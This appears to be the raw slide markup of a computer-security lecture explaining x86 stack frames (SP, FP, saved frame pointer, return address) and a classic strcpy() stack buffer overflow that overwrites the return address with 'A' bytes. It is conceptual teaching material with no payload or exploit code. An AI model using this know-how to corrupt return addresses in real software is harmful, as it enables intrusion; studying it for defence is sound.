              <a:t> store FP, which points to</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>the current stack frame</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>We call the saved FP in stack as SFP.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>Copies the current SP onto %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>, make it the new FP.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1"/>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t> stores SP, which points to the top of the stack.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9220" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6781800" y="2971800"/>
            <a:ext cx="2209800" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0099FF"/>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c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9221" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6781800" y="2514600"/>
            <a:ext cx="2209800" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0099FF"/>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b</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9222" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6781800" y="2057400"/>
            <a:ext cx="2209800" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0099FF"/>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a</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9223" name="Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6781800" y="1600200"/>
            <a:ext cx="2209800" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFCC00"/>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ret</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9224" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6781800" y="1143000"/>
            <a:ext cx="2209800" cy="4572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sfp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9225" name="Text Box 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7391400" y="3657600"/>
            <a:ext cx="860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2400"/>
              <a:t>Stack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9226" name="Text Box 11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5818188" y="30163"/>
            <a:ext cx="106997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1800"/>
              <a:t>Lower</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800"/>
              <a:t>Memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800"/>
              <a:t>addresses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9227" name="Text Box 12"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5822950" y="2957513"/>
            <a:ext cx="10699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1800"/>
              <a:t>Higher</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800"/>
              <a:t>Memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800"/>
              <a:t>addresses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 1"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4722503" y="919956"/>
            <a:ext cx="1949450" cy="369888"/>
            <a:chOff x="4679950" y="914400"/>
            <a:chExt cx="1949450" cy="369888"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9228" name="Line 16"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="5867400" y="1143000"/>
              <a:ext cx="7620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229" name="Text Box 17"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4679950" y="914400"/>
              <a:ext cx="1144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1800"/>
                <a:t>SP (%esp)</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219C9A6E-73A0-4244-AB61-8A2C1B139C59}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400"/>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10243" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="533400"/>
            <a:ext cx="7772400" cy="5562600"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>Allocates space for the local variables by subtracting their size from SP.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>Memory is addressed in multiples of the word size.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>In our case, the word size is 4 bytes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>5 byte buffer take 8 bytes (2 words).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>10 byte buffer take 12 bytes (3 words).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>SP is subtracted by 20.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>Note that the address calculation varies in different systems, compilers, and compiler settings.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW"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76BC1893-5260-49C3-820A-A2526523F62E}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400"/>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:t>12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11267" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3276600" y="4800600"/>
            <a:ext cx="2209800" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0099FF"/>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c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11268" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3276600" y="4343400"/>
            <a:ext cx="2209800" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0099FF"/>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b</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11269" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3276600" y="3886200"/>
            <a:ext cx="2209800" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0099FF"/>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a</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11270" name="Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3276600" y="3429000"/>
            <a:ext cx="2209800" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFCC00"/>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ret</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11271" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3276600" y="2971800"/>
            <a:ext cx="2209800" cy="4572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sfp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11272" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3276600" y="2133600"/>
            <a:ext cx="2209800" cy="838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buffer1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11273" name="Rectangle 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3276600" y="838200"/>
            <a:ext cx="2209800" cy="1295400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00CC66"/>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buffer2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11274" name="Text Box 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3886200" y="5486400"/>
            <a:ext cx="860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2400"/>
              <a:t>Stack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11275" name="Line 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5562600" y="2971800"/>
            <a:ext cx="9144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nvGrpSpPr>
          <p:cNvPr id="2" name="Group 1"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5588000" y="653256"/>
            <a:ext cx="2119313" cy="369888"/>
            <a:chOff x="5562600" y="647700"/>
            <a:chExt cx="2119313" cy="369888"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11276" name="Line 16"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5562600" y="838200"/>
              <a:ext cx="9144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1277" name="Text Box 17"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6537325" y="647700"/>
              <a:ext cx="1144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1800"/>
                <a:t>SP (%esp)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11278" name="Text Box 18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6537325" y="2781300"/>
            <a:ext cx="1169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1800"/>
              <a:t>FP (%ebp)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11279" name="Text Box 11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1828800" y="479425"/>
            <a:ext cx="11557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2000"/>
              <a:t>Lower</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000"/>
              <a:t>Memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000"/>
              <a:t>addresses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11280" name="Text Box 12"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1752600" y="4754563"/>
            <a:ext cx="11557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2000"/>
              <a:t>Higher</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000"/>
              <a:t>Memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000"/>
              <a:t>addresses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5413BC57-B45C-4AF4-9FC5-6774D4BF2D2D}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400"/>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13314" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Buffer Overflows</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12292" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:t>Result of stuffing more data into a buffer than it can handle.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:t>See the following example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:t>It copies a string without bound checking by using strcpy() instead of strncpy().</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:t>Copy the contents of *str into buffer[] until a null character is found.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="12293" name="Object 4">
            <a:hlinkClick r:id="" action="ppaction://ole?verb=1"/>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2537694115"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4038600" y="3276600"/>
          <a:ext cx="914400" cy="714375"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s12341" name="Wordpad Document" showAsIcon="1" r:id="rId4" imgW="914400" imgH="714240" progId="WordPad.Document.1">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Wordpad Document" showAsIcon="1" r:id="rId4" imgW="914400" imgH="714240" progId="WordPad.Document.1">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="Object 4"/>
                      <p:cNvPicPr>
                        <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                      </p:cNvPicPr>
                      <p:nvPr/>
                    </p:nvPicPr>
                    <p:blipFill>
                      <a:blip r:embed="rId5"/>
                      <a:srcRect/>
                      <a:stretch>
                        <a:fillRect/>
                      </a:stretch>
                    </p:blipFill>
                    <p:spPr bwMode="auto">
                      <a:xfrm>
                        <a:off x="4038600" y="3276600"/>
                        <a:ext cx="914400"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9258A71D-52F9-4B15-9753-20AF22B215FC}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400"/>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:t>14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13315" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="838200" y="3886200"/>
            <a:ext cx="2209800" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0099FF"/>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zh-TW" altLang="en-US" sz="2400"/>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400"/>
              <a:t>str</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13316" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="838200" y="3429000"/>
            <a:ext cx="2209800" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFCC00"/>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ret</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13317" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="838200" y="2971800"/>
            <a:ext cx="2209800" cy="4572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sfp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13318" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="838200" y="1143000"/>
            <a:ext cx="2209800" cy="1828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buffer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13319" name="Text Box 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1447800" y="4800600"/>
            <a:ext cx="860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2400"/>
              <a:t>Stack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13320" name="Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3200400" y="533400"/>
            <a:ext cx="52578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lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>buffer[] (16 bytes) is much smaller than *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> (256 bytes).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>All 239 bytes after buffer in the stack are being overwritten with character ‘A’ (0x41)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Include SFP, RET and even *str.</a:t>
